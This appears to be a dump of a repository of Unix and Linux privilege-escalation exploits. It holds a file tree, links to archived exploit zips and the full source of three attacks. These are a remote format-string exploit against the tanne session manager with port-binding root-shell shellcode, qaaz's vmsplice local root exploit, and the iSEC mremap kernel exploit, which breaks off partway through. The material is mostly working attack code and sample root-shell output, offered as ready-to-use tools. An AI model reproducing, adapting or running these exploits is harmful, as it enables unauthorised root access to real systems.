├── 04.zip ├── 05.zip ├── 06.zip ├── 0x82-Remote.tannehehe.xpl.c ├── 2.6.17.c ├── 2.6.18-164.zip ├── 2.6.37.zip ├── 48local.zip ├── Linux_kernel_mremap.c ├── README.md ├── afd-expl.zip ├── alsaplayer-suid.zip ├── binfmt_elf.c ├── brk.zip ├── brk2.zip ├── bsd.zip ├── crontab.c ├── cw7.3.zip ├── dyld_print_to_file_root.sh ├── efs_local.c ├── efs_local.zip ├── elfcd1.c ├── elfcd2.c ├── elflbl.zip ├── enlightenment.tgz ├── epcs2.c ├── exp.sh ├── expand_stack.c ├── exploit.c ├── exploit.zip ├── freedbs5.3.zip ├── full-nelson.c ├── h00lyshit.c ├── h00lyshit.zip ├── half-nelson.c ├── hatorihanzo.c ├── hudo.c ├── ifenslave.c ├── ifenslave.zip ├── k-rad.c ├── k-rad3.zip ├── kmod.zip ├── kmod2.zip ├── krad.zip ├── krad2.zip ├── loginx.zip ├── mremap_pte.zip ├── myptrace.zip ├── newlocal.zip ├── nslconf.zip ├── ohMy-another-efs.zip ├── ong_bak.c ├── prct1.c ├── prct1.zip ├── prct2.c ├── prct2.zip ├── prct3.c ├── prct3.zip ├── prct4.c ├── prct4.zip ├── prct5.sh ├── prct6.c ├── prct6.zip ├── ptrace-kmod.zip ├── ptrace.c ├── ptrace.zip ├── ptrace24.c ├── ptrace24.zip ├── pwned.c ├── pwned.zip ├── r00t.zip ├── raptor.zip ├── raptor_libC.sh ├── raptor_libnspr.sh ├── raptor_libnspr2.sh ├── raptor_libnspr3.sh ├── raptor_peek.c ├── raptor_sysinfo.c ├── raptor_ucbps.sh ├── rh71sm8.c ├── rootpipe.py ├── tmb-vs-ibm-aix-libodm.c ├── uselib24.c ├── uselib24.zip ├── vmsplice.c ├── w00t.sh ├── x.zip ├── x2.zip └── xpl-2.6.31-2010.zip /04.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/04.zip -------------------------------------------------------------------------------- /05.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/05.zip -------------------------------------------------------------------------------- /06.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/06.zip -------------------------------------------------------------------------------- /0x82-Remote.tannehehe.xpl.c: -------------------------------------------------------------------------------- 1 | /* 2 | ** 3 | ** [*] Title: Remote format string vulnerability in Tanne. 4 | ** [+] Exploit code: 0x82-Remote.tannehehe.xpl.c 5 | ** 6 | ** [+] Description -- 7 | ** 8 | ** About: 9 | ** tanne is a small, secure session-management solution for HTTP. 10 | ** It replaces common sessions with a system consisting of PIN and TANs, 11 | ** well known from online banking. 12 | ** It's main purpose is to enable programmers of Web applications 13 | ** to have real secure sessions without cookies or session-ids. 14 | ** 15 | ** More detailed information is http://tanne.fluxnetz.de/. 16 | ** 17 | ** Vulnerability can presume as following. 18 | ** There is logger() function to 29 lines of 'netzio.c' code. 19 | ** 20 | ** __ 21 | ** ... 22 | ** 65 syslog( LOG_INFO, txt ); // Here. 23 | ** ... 24 | ** 74 syslog( LOG_INFO, txt ); // Here. 25 | ** ... 26 | ** -- 27 | ** 28 | ** This is very dangerous security vulnerability. 29 | ** It's known already well. ;-) 30 | ** 31 | ** [+] Vulnerable Packages -- 32 | ** 33 | ** Vendor site: http://tanne.fluxnetz.de/ 34 | ** 35 | ** tanne 0.6.17 36 | ** -tanne-0.6.17.tar.bz2 37 | ** +Linux 38 | ** +Other 39 | ** 40 | ** [+] Exploit -- 41 | ** 42 | ** Proof of Concept on RedHat Linux 8.0, tanne-0.6.17.tar.bz2: 43 | ** 44 | ** bash-2.05b$ ./0x82-Remote.tannehehe.xpl -t2 45 | ** 46 | ** Tanne Remote format string Xploit by Xpl017Elz 47 | ** 48 | ** [*] Target host localhost 49 | ** [*] Target type: Red Hat Linux release 8.0 (Psyche) tanne-0.6.17.tar.bz2 50 | ** 51 | ** [1] Make it Format String. 52 | ** [-] syslog GOT address: 0x804d1c8 53 | ** [2] Pushing Shellcode. 54 | ** [-] Shellcode address: 0xbffff974 55 | ** [3] Setting Sock. 56 | ** [4] Send Code. 57 | ** [*] Waiting Rootshell :-) 58 | ** [5] Trying localhost:36864 ... 59 | ** [6] Connected to localhost:36864 ! 60 | ** 61 | ** [*] Executed shell successfully ! 62 | ** [*] OK, It's Rootshell 63 | ** 64 | ** Linux thanks_maze_dorumuk 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 65 | ** i686 i686 i386 GNU/Linux 66 | ** uid=0(root) gid=2(daemon) groups=0(root),1(bin),2(daemon),3(sys),4(adm), 67 | ** 6(disk),10(wheel) 68 | ** bash: no job control in this shell 69 | ** stty: standard input: Invalid argument 70 | ** [root@maze_dorumuk tanne-0.6.17]# id 71 | ** uid=0(root) gid=2(daemon) groups=0(root),1(bin),2(daemon),3(sys),4(adm), 72 | ** 6(disk),10(wheel) 73 | ** [root@maze_dorumuk tanne-0.6.17]# exit 74 | ** exit 75 | ** 76 | ** [*] Happy Exploit ! 77 | ** 78 | ** bash-2.05b$ 79 | ** 80 | ** GOT syslog address? 81 | ** 82 | ** bash-2.05b$ objdump --dynamic-reloc tanned | grep syslog 83 | ** 0804d1c8 R_386_JUMP_SLOT syslog 84 | ** bash-2.05b$ 85 | ** 86 | ** -- 87 | ** exploit by "you dong-hun"(Xpl017Elz), . 88 | ** My World: http://x82.i21c.net & http://x82.inetcop.org 89 | ** 90 | */ 91 | /* 92 | ** -=-= POINT! POINT! POINT! POINT! POINT! =-=- 93 | ** 94 | ** If compile by DEBUG mode, it exploit do can. 95 | ** It's Proof of concept. (Therefore, don't support 'Brute-force' mode.) 96 | ** 97 | ** P.S Joke: 98 | ** 99 | ** I suffer because of English ability such as child sometimes. :-( 100 | ** So, I'm studying English hard. hehehe! 101 | ** 102 | ** Where is really fine English teacher?! 103 | ** 104 | ** Greets: 105 | ** 106 | ** Developer Uli Funcke, mAzE_Dorumuk, BrainStorm (hello!), 107 | ** ElectronicSouls (#!electronicsouls@efnet), INetCop(C) Security. 108 | ** 109 | */ 110 | 111 | #define Xpl017Elz x82 112 | #define x0x_test1 (0x82*16) 113 | #define x0x_test2 (0x82*8) 114 | #define x0x_test3 (0x82*4) 115 | #define x0x_test4 (0x82) 116 | 117 | #include 118 | #include 119 | #include 120 | #include 121 | 122 | #define HOST "localhost" 123 | #define PORT 14002 124 | 125 | struct os { 126 | int num; 127 | char *ost; 128 | unsigned long gotrs; 129 | unsigned long shell; 130 | int flag; 131 | }; 132 | 133 | struct os plat[] = 134 | { 135 | { 136 | 0,"Red Hat Linux release 6.1 (Cartman) tanne-0.6.17.tar.bz2", 137 | 0x0804d224,0xbffffa14,11 138 | }, 139 | { 140 | 1,"Red Hat Linux release 7.0 (Guinness) tanne-0.6.17.tar.bz2", 141 | 0x0804d260,0xbffff974,5 142 | }, 143 | { 144 | 2,"Red Hat Linux release 8.0 (Psyche) tanne-0.6.17.tar.bz2", 145 | 0x0804d1c8,0xbffff974,5 146 | } 147 | }; 148 | 149 | // This is lovable shellcode, that's sweet in linux platform. 150 | char shellcode[]= /* portshell shellcode, 128 bytes (tcp/36864) */ 151 | "\xeb\x72\x5e\x29\xc0\x89\x46\x10\x40\x89\xc3\x89\x46\x0c\x40\x89" 152 | "\x46\x08\x8d\x4e\x08\xb0\x66\xcd\x80\x43\xc6\x46\x10\x10\x66\x89" 153 | "\x5e\x14\x88\x46\x08\x29\xc0\x89\xc2\x89\x46\x18\xb0\x90\x66\x89" 154 | "\x46\x16\x8d\x4e\x14\x89\x4e\x0c\x8d\x4e\x08\xb0\x66\xcd\x80\x89" 155 | "\x5e\x0c\x43\x43\xb0\x66\xcd\x80\x89\x56\x0c\x89\x56\x10\xb0\x66" 156 | "\x43\xcd\x80\x86\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0\x3f\x41\xcd\x80" 157 | "\xb0\x3f\x41\xcd\x80\x88\x56\x07\x89\x76\x0c\x87\xf3\x8d\x4b\x0c" 158 | "\xb0\x0b\xcd\x80\xe8\x89\xff\xff\xff/bin/sh"; 159 | unsigned char x82x82x82[x0x_test1]; 160 | 161 | void banrl(); 162 | int makefmt(u_long retloc,u_long shaddr,int flag); 163 | int setsock(char *hostname, int port); 164 | void usage(char *argument); 165 | void re_connt(int sock); 166 | void exect_sh(int sock); 167 | 168 | int main(argc,argv) 169 | int argc; 170 | char *argv[]; 171 | { 172 | int ax82=0; 173 | int type=0; 174 | int port=PORT; 175 | int flag=plat[type].flag; 176 | int sockr,sockr2; 177 | 178 | extern char *optarg; 179 | char hostname[x0x_test4]=HOST; 180 | unsigned long retloc=plat[type].gotrs; 181 | unsigned long shaddr=plat[type].shell; 182 | 183 | (void)banrl(); 184 | while((ax82=getopt(argc,argv,"R:r:S:s:F:f:H:h:T:t:Ii"))!=EOF) 185 | { 186 | switch(ax82) 187 | { 188 | case 'R': 189 | case 'r': 190 | retloc=strtoul(optarg,NULL,0); 191 | break; 192 | 193 | case 'S': 194 | case 's': 195 | shaddr=strtoul(optarg,NULL,0); 196 | break; 197 | 198 | case 'F': 199 | case 'f': 200 | flag=atoi(optarg); 201 | break; 202 | 203 | case 'H': 204 | case 'h': 205 | strncpy(hostname,optarg,x0x_test4); 206 | break; 207 | 208 | case 'T': 209 | case 't': 210 | type=atoi(optarg); 211 | if(type>2) /* 0,1,2 */ 212 | { 213 | (void)usage(argv[0]); 214 | } 215 | else { 216 | retloc=plat[type].gotrs; 217 | shaddr=plat[type].shell; 218 | flag=plat[type].flag; 219 | } 220 | break; 221 | 222 | case 'I': 223 | case 'i': 224 | (void)usage(argv[0]); 225 | break; 226 | 227 | case '?': 228 | fprintf(stderr, 229 | " Try `%s -i' for more information.\n\n",argv[0]); 230 | exit(-1); 231 | break; 232 | } 233 | } 234 | 235 | fprintf(stdout," [*] Target host %s\n",hostname); 236 | fprintf(stdout," [*] Target type: %s\n\n",plat[type].ost); 237 | 238 | fprintf(stdout," [1] Make it Format String.\n"); 239 | fprintf(stdout," [-] syslog GOT address: %p\n",retloc); 240 | (int)makefmt((u_long)retloc,(u_long)shaddr,(int)flag); 241 | 242 | fprintf(stdout," [3] Setting Sock.\n"); 243 | sockr=setsock(hostname,port); 244 | (void)re_connt(sockr); 245 | 246 | fprintf(stdout," [4] Send Code.\n"); 247 | send(sockr,x82x82x82,strlen(x82x82x82),0); 248 | fprintf(stdout," [*] Waiting Rootshell :-)\n"); 249 | sleep(1); 250 | 251 | fprintf(stdout," [5] Trying %s:36864 ...\n",hostname); 252 | sockr2=setsock(hostname,36864); 253 | (void)re_connt(sockr2); 254 | fprintf(stdout," [6] Connected to %s:36864 !\n\n",hostname); 255 | (void)exect_sh(sockr2); 256 | 257 | } 258 | 259 | void banrl() { 260 | fprintf(stdout,"\n Tanne Remote format string Xploit by Xpl017Elz\n\n"); 261 | } 262 | 263 | int makefmt(u_long retloc,u_long shaddr,int flag) 264 | { 265 | unsigned char x82x82[x0x_test2]; 266 | unsigned char x0x[x0x_test3]; 267 | 268 | int bx82,cx82,ex82,fx82,gx82,hx82; 269 | int add1,add2,add3,add4; 270 | bx82=cx82=ex82=fx82=gx82=hx82=0; 271 | add1=add2=add3=add4=0; 272 | 273 | memset((char *)x82x82x82,0,x0x_test1); 274 | memset((char *)x82x82,0,x0x_test2); 275 | memset((char *)x0x,0,x0x_test3); 276 | 277 | *(long *)&x0x[0]=0x82828282; 278 | *(long *)&x0x[4]=retloc+0; 279 | 280 | *(long *)&x0x[8]=0x82828282; 281 | *(long *)&x0x[12]=retloc+1; 282 | 283 | *(long *)&x0x[16]=0x82828282; 284 | *(long *)&x0x[20]=retloc+2; 285 | 286 | *(long *)&x0x[24]=0x82828282; 287 | *(long *)&x0x[28]=retloc+3; 288 | /* real */ 289 | ex82=(shaddr>>24)&0xff; 290 | fx82=(shaddr>>16)&0xff; 291 | gx82=(shaddr>> 8)&0xff; 292 | hx82=(shaddr>> 0)&0xff; 293 | /* test */ 294 | add1=(shaddr>>24)&0xff; 295 | add2=(shaddr>>16)&0xff; 296 | add3=(shaddr>> 8)&0xff; 297 | add4=(shaddr>> 0)&0xff; 298 | 299 | if((add4-40)<10) 300 | hx82+=0x100; 301 | if((add3-add4)<10) 302 | gx82+=0x100; 303 | if((add2-add3)<10) 304 | fx82+=0x100; 305 | 306 | for(bx82=0;bx82<0x140-strlen(shellcode);bx82++) 307 | x82x82[bx82]='N'; /* CodeRed?! Whoou ... */ 308 | for(cx82=0;cx82h_addr); 383 | bzero(&(x82_addr.sin_zero),8); 384 | 385 | if(connect(sock,(struct sockaddr *)&x82_addr, 386 | sizeof(struct sockaddr))==EOF) 387 | { 388 | perror(" [-] connect() error"); 389 | return(-1); 390 | } 391 | 392 | return(sock); 393 | 394 | } 395 | 396 | void exect_sh(int sock) 397 | { 398 | int pckt; 399 | char *cmd="uname -a;id;export TERM=vt100;exec bash -i\n"; 400 | char rbuf[1024]; 401 | fd_set rset; 402 | memset((char *)rbuf,0,1024); 403 | 404 | fprintf(stdout," [*] Executed shell successfully !\n"); 405 | fprintf(stdout," [*] OK, It's Rootshell\n\n"); 406 | send(sock,cmd,strlen(cmd),0); 407 | 408 | while(1) 409 | { 410 | fflush(stdout); 411 | FD_ZERO(&rset); 412 | FD_SET(sock,&rset); 413 | FD_SET(STDIN_FILENO,&rset); 414 | select(sock+1,&rset,NULL,NULL,NULL); 415 | 416 | if(FD_ISSET(sock,&rset)) 417 | { 418 | pckt=read(sock,rbuf,1024); 419 | if(pckt<=0) 420 | { 421 | fprintf(stdout,"\n [*] Happy Exploit !\n\n"); 422 | exit(0); 423 | } 424 | rbuf[pckt]=0; 425 | printf("%s",rbuf); 426 | } 427 | if(FD_ISSET(STDIN_FILENO,&rset)) 428 | { 429 | pckt=read(STDIN_FILENO,rbuf,1024); 430 | if(pckt>0) 431 | { 432 | rbuf[pckt]=0; 433 | write(sock,rbuf,pckt); 434 | } 435 | } 436 | } 437 | return; 438 | } 439 | 440 | /* eox */ 441 | 442 | 443 | 444 | -- 445 | _______________________________________________ 446 | Get your free email from http://www.hackermail.com 447 | 448 | Powered by Outblaze 449 | -------------------------------------------------------------------------------- /2.6.17.c: -------------------------------------------------------------------------------- 1 | /* 2 | * jessica_biel_naked_in_my_bed.c 3 | * 4 | * Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura. 5 | * Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca. 6 | * Stejnak je to stare jak cyp a aj jakesyk rozbite. 7 | * 8 | * Linux vmsplice Local Root Exploit 9 | * By qaaz 10 | * 11 | * Linux 2.6.17 - 2.6.24.1 12 | * 13 | * This is quite old code and I had to rewrite it to even compile. 14 | * It should work well, but I don't remeber original intent of all 15 | * the code, so I'm not 100% sure about it. You've been warned ;) 16 | * 17 | * -static -Wno-format 18 | */ 19 | #define _GNU_SOURCE 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | #include 29 | #include 30 | #include 31 | #define __KERNEL__ 32 | #include 33 | 34 | #define PIPE_BUFFERS 16 35 | #define PG_compound 14 36 | #define uint unsigned int 37 | #define static_inline static inline __attribute__((always_inline)) 38 | #define STACK(x) (x + sizeof(x) - 40) 39 | 40 | struct page { 41 | unsigned long flags; 42 | int count; 43 | int mapcount; 44 | unsigned long private; 45 | void *mapping; 46 | unsigned long index; 47 | struct { long next, prev; } lru; 48 | }; 49 | 50 | void exit_code(); 51 | char exit_stack[1024 * 1024]; 52 | 53 | void die(char *msg, int err) 54 | { 55 | printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err)); 56 | fflush(stdout); 57 | fflush(stderr); 58 | exit(1); 59 | } 60 | 61 | #if defined (__i386__) 62 | 63 | #ifndef __NR_vmsplice 64 | #define __NR_vmsplice 316 65 | #endif 66 | 67 | #define USER_CS 0x73 68 | #define USER_SS 0x7b 69 | #define USER_FL 0x246 70 | 71 | static_inline 72 | void exit_kernel() 73 | { 74 | __asm__ __volatile__ ( 75 | "movl %0, 0x10(%%esp) ;" 76 | "movl %1, 0x0c(%%esp) ;" 77 | "movl %2, 0x08(%%esp) ;" 78 | "movl %3, 0x04(%%esp) ;" 79 | "movl %4, 0x00(%%esp) ;" 80 | "iret" 81 | : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL), 82 | "i" (USER_CS), "r" (exit_code) 83 | ); 84 | } 85 | 86 | static_inline 87 | void * get_current() 88 | { 89 | unsigned long curr; 90 | __asm__ __volatile__ ( 91 | "movl %%esp, %%eax ;" 92 | "andl %1, %%eax ;" 93 | "movl (%%eax), %0" 94 | : "=r" (curr) 95 | : "i" (~8191) 96 | ); 97 | return (void *) curr; 98 | } 99 | 100 | #elif defined (__x86_64__) 101 | 102 | #ifndef __NR_vmsplice 103 | #define __NR_vmsplice 278 104 | #endif 105 | 106 | #define USER_CS 0x23 107 | #define USER_SS 0x2b 108 | #define USER_FL 0x246 109 | 110 | static_inline 111 | void exit_kernel() 112 | { 113 | __asm__ __volatile__ ( 114 | "swapgs ;" 115 | "movq %0, 0x20(%%rsp) ;" 116 | "movq %1, 0x18(%%rsp) ;" 117 | "movq %2, 0x10(%%rsp) ;" 118 | "movq %3, 0x08(%%rsp) ;" 119 | "movq %4, 0x00(%%rsp) ;" 120 | "iretq" 121 | : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL), 122 | "i" (USER_CS), "r" (exit_code) 123 | ); 124 | } 125 | 126 | static_inline 127 | void * get_current() 128 | { 129 | unsigned long curr; 130 | __asm__ __volatile__ ( 131 | "movq %%gs:(0), %0" 132 | : "=r" (curr) 133 | ); 134 | return (void *) curr; 135 | } 136 | 137 | #else 138 | #error "unsupported arch" 139 | #endif 140 | 141 | #if defined (_syscall4) 142 | #define __NR__vmsplice __NR_vmsplice 143 | _syscall4( 144 | long, _vmsplice, 145 | int, fd, 146 | struct iovec *, iov, 147 | unsigned long, nr_segs, 148 | unsigned int, flags) 149 | 150 | #else 151 | #define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl)) 152 | #endif 153 | 154 | static uint uid, gid; 155 | 156 | void kernel_code() 157 | { 158 | int i; 159 | uint *p = get_current(); 160 | 161 | for (i = 0; i < 1024-13; i++) { 162 | if (p[0] == uid && p[1] == uid && 163 | p[2] == uid && p[3] == uid && 164 | p[4] == gid && p[5] == gid && 165 | p[6] == gid && p[7] == gid) { 166 | p[0] = p[1] = p[2] = p[3] = 0; 167 | p[4] = p[5] = p[6] = p[7] = 0; 168 | p = (uint *) ((char *)(p + 8) + sizeof(void *)); 169 | p[0] = p[1] = p[2] = ~0; 170 | break; 171 | } 172 | p++; 173 | } 174 | 175 | exit_kernel(); 176 | } 177 | 178 | void exit_code() 179 | { 180 | if (getuid() != 0) 181 | die("wtf", 0); 182 | 183 | printf("[+] root\n"); 184 | putenv("HISTFILE=/dev/null"); 185 | execl("/bin/bash", "bash", "-i", NULL); 186 | die("/bin/bash", errno); 187 | } 188 | 189 | int main(int argc, char *argv[]) 190 | { 191 | int pi[2]; 192 | size_t map_size; 193 | char * map_addr; 194 | struct iovec iov; 195 | struct page * pages[5]; 196 | 197 | uid = getuid(); 198 | gid = getgid(); 199 | setresuid(uid, uid, uid); 200 | setresgid(gid, gid, gid); 201 | 202 | printf("-----------------------------------\n"); 203 | printf(" Linux vmsplice Local Root Exploit\n"); 204 | printf(" By qaaz\n"); 205 | printf("-----------------------------------\n"); 206 | 207 | if (!uid || !gid) 208 | die("!@#$", 0); 209 | 210 | /*****/ 211 | pages[0] = *(void **) &(int[2]){0,PAGE_SIZE}; 212 | pages[1] = pages[0] + 1; 213 | 214 | map_size = PAGE_SIZE; 215 | map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE, 216 | MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); 217 | if (map_addr == MAP_FAILED) 218 | die("mmap", errno); 219 | 220 | memset(map_addr, 0, map_size); 221 | printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size); 222 | printf("[+] page: 0x%lx\n", pages[0]); 223 | printf("[+] page: 0x%lx\n", pages[1]); 224 | 225 | pages[0]->flags = 1 << PG_compound; 226 | pages[0]->private = (unsigned long) pages[0]; 227 | pages[0]->count = 1; 228 | pages[1]->lru.next = (long) kernel_code; 229 | 230 | /*****/ 231 | pages[2] = *(void **) pages[0]; 232 | pages[3] = pages[2] + 1; 233 | 234 | map_size = PAGE_SIZE; 235 | map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE, 236 | MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); 237 | if (map_addr == MAP_FAILED) 238 | die("mmap", errno); 239 | 240 | memset(map_addr, 0, map_size); 241 | printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size); 242 | printf("[+] page: 0x%lx\n", pages[2]); 243 | printf("[+] page: 0x%lx\n", pages[3]); 244 | 245 | pages[2]->flags = 1 << PG_compound; 246 | pages[2]->private = (unsigned long) pages[2]; 247 | pages[2]->count = 1; 248 | pages[3]->lru.next = (long) kernel_code; 249 | 250 | /*****/ 251 | pages[4] = *(void **) &(int[2]){PAGE_SIZE,0}; 252 | map_size = PAGE_SIZE; 253 | map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE, 254 | MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); 255 | if (map_addr == MAP_FAILED) 256 | die("mmap", errno); 257 | memset(map_addr, 0, map_size); 258 | printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size); 259 | printf("[+] page: 0x%lx\n", pages[4]); 260 | 261 | /*****/ 262 | map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE; 263 | map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE, 264 | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); 265 | if (map_addr == MAP_FAILED) 266 | die("mmap", errno); 267 | 268 | memset(map_addr, 0, map_size); 269 | printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size); 270 | 271 | /*****/ 272 | map_size -= 2 * PAGE_SIZE; 273 | if (munmap(map_addr + map_size, PAGE_SIZE) < 0) 274 | die("munmap", errno); 275 | 276 | /*****/ 277 | if (pipe(pi) < 0) die("pipe", errno); 278 | close(pi[0]); 279 | 280 | iov.iov_base = map_addr; 281 | iov.iov_len = ULONG_MAX; 282 | 283 | signal(SIGPIPE, exit_code); 284 | _vmsplice(pi[1], &iov, 1, 0); 285 | die("vmsplice", errno); 286 | return 0; 287 | } 288 | 289 | -------------------------------------------------------------------------------- /2.6.18-164.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/2.6.18-164.zip -------------------------------------------------------------------------------- /2.6.37.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/2.6.37.zip -------------------------------------------------------------------------------- /48local.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/48local.zip -------------------------------------------------------------------------------- /Linux_kernel_mremap.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Linux kernel mremap() bound checking bug exploit. 3 | * 4 | * Bug found by Paul Starzetz 5 | * 6 | * Copyright (c) 2004 iSEC Security Research. All Rights Reserved. 7 | * Republish www.securitylab.ru 8 | * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS" 9 | * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION 10 | * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED. 11 | */ 12 | 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | 24 | #include 25 | #include 26 | #include 27 | 28 | #include 29 | 30 | #define MREMAP_MAYMOVE 1 31 | #define MREMAP_FIXED 2 32 | 33 | #define str(s) #s 34 | #define xstr(s) str(s) 35 | 36 | #define DSIGNAL SIGCHLD 37 | #define CLONEFL (DSIGNAL|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_VFORK) 38 | #define PAGEADDR 0x2000 39 | 40 | #define RNDINT 512 41 | 42 | #define NUMVMA (3 * 5 * 257) 43 | #define NUMFORK (17 * 65537) 44 | 45 | #define DUPTO 1000 46 | #define TMPLEN 256 47 | 48 | #define __NR_sys_mremap 163 49 | 50 | _syscall5(ulong, sys_mremap, ulong, a, ulong, b, ulong, c, ulong, d, ulong, e); 51 | unsigned long sys_mremap(unsigned long addr, unsigned long old_len, unsigned long 52 | new_len, 53 | unsigned long flags, unsigned long new_addr); 54 | 55 | 56 | static volatile int pid = 0, ppid, hpid, *victim, *fops, blah = 0, dummy = 0, uid, 57 | gid; 58 | static volatile int *vma_ro, *vma_rw, *tmp; 59 | static volatile unsigned fake_file[16]; 60 | 61 | 62 | void fatal(const char * msg) 63 | { 64 | printf("\n"); 65 | if (!errno) { 66 | fprintf(stderr, "FATAL: %s\n", msg); 67 | } else { 68 | perror(msg); 69 | } 70 | 71 | printf("\nentering endless loop"); 72 | fflush(stdout); 73 | fflush(stderr); 74 | while (1) pause(); 75 | } 76 | 77 | void kernel_code(void * file, loff_t offset, int origin) 78 | { 79 | int i, c; 80 | int *v; 81 | 82 | if (!file) 83 | goto out; 84 | 85 | __asm__("movl %%esp, %0" : : "m" (c)); 86 | 87 | c &= 0xffffe000; 88 | v = (void *) c; 89 | 90 | for (i = 0; i < PAGE_SIZE / sizeof(*v) - 1; i++) { 91 | if (v[i] == uid && v[i+1] == uid) { 92 | i++; v[i++] = 0; v[i++] = 0; v[i++] = 0; 93 | } 94 | if (v[i] == gid) { 95 | v[i++] = 0; v[i++] = 0; v[i++] = 0; v[i++] = 0; 96 | break; 97 | } 98 | } 99 | out: 100 | dummy++; 101 | } 102 | 103 | void try_to_exploit(void) 104 | { 105 | int v = 0; 106 | 107 | v += fops[0]; 108 | v += fake_file[0]; 109 | 110 | kernel_code(0, 0, v); 111 | lseek(DUPTO, 0, SEEK_SET); 112 | 113 | if (geteuid()) { 114 | printf("\nFAILED uid!=0"); fflush(stdout); 115 | errno =- ENOSYS; 116 | fatal("uid change"); 117 | } 118 | 119 | printf("\n[+] PID %d GOT UID 0, enjoy!", getpid()); fflush(stdout); 120 | 121 | kill(ppid, SIGUSR1); 122 | setresuid(0, 0, 0); 123 | sleep(1); 124 | 125 | printf("\n\n"); fflush(stdout); 126 | 127 | execl("/bin/bash", "bash", NULL); 128 | fatal("burp"); 129 | } 130 | 131 | void cleanup(int v) 132 | { 133 | victim[DUPTO] = victim[0]; 134 | kill(0, SIGUSR2); 135 | } 136 | 137 | 138 | void redirect_filp(int v) 139 | { 140 | printf("\n[!] parent check race... "); fflush(stdout); 141 | 142 | if (victim[DUPTO] && victim[0] == victim[DUPTO]) { 143 | printf("SUCCESS, cought SLAB page!"); fflush(stdout); 144 | victim[DUPTO] = (unsigned) & fake_file; 145 | signal(SIGUSR1, &cleanup); 146 | kill(pid, SIGUSR1); 147 | } else { 148 | printf("FAILED!"); 149 | } 150 | fflush(stdout); 151 | } 152 | 153 | int get_slab_objs(void) 154 | { 155 | FILE * fp; 156 | int c, d, u = 0, a = 0; 157 | static char line[TMPLEN], name[TMPLEN]; 158 | 159 | fp = fopen("/proc/slabinfo", "r"); 160 | if (!fp) 161 | fatal("fopen"); 162 | 163 | fgets(name, sizeof(name) - 1, fp); 164 | do { 165 | c = u = a =- 1; 166 | if (!fgets(line, sizeof(line) - 1, fp)) 167 | break; 168 | c = sscanf(line, "%s %u %u %u %u %u %u", name, &u, &a, &d, &d, &d, &d); 169 | } while (strcmp(name, "size-4096")); 170 | 171 | fclose(fp); 172 | 173 | return c == 7 ? a - u : -1; 174 | } 175 | 176 | void unprotect(int v) 177 | { 178 | int n, c = 1; 179 | 180 | *victim = 0; 181 | printf("\n[+] parent unprotected PTE "); fflush(stdout); 182 | 183 | dup2(0, 2); 184 | while (1) { 185 | n = get_slab_objs(); 186 | if (n < 0) 187 | fatal("read slabinfo"); 188 | if (n > 0) { 189 | printf("\n depopulate SLAB #%d", c++); 190 | blah = 0; kill(hpid, SIGUSR1); 191 | while (!blah) pause(); 192 | } 193 | if (!n) { 194 | blah = 0; kill(hpid, SIGUSR1); 195 | while (!blah) pause(); 196 | dup2(0, DUPTO); 197 | break; 198 | } 199 | } 200 | 201 | signal(SIGUSR1, &redirect_filp); 202 | kill(pid, SIGUSR1); 203 | } 204 | 205 | void cleanup_vmas(void) 206 | { 207 | int i = NUMVMA; 208 | 209 | while (1) { 210 | tmp = mmap((void *) (PAGEADDR - PAGE_SIZE), PAGE_SIZE, PROT_READ, 211 | MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, 0, 0); 212 | if (tmp != (void *) (PAGEADDR - PAGE_SIZE)) { 213 | printf("\n[-] ERROR unmapping %d", i); fflush(stdout); 214 | fatal("unmap1"); 215 | } 216 | i--; 217 | if (!i) 218 | break; 219 | 220 | tmp = mmap((void *) (PAGEADDR - PAGE_SIZE), PAGE_SIZE, PROT_READ|PROT_WRITE, 221 | MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS, 0, 0); 222 | if 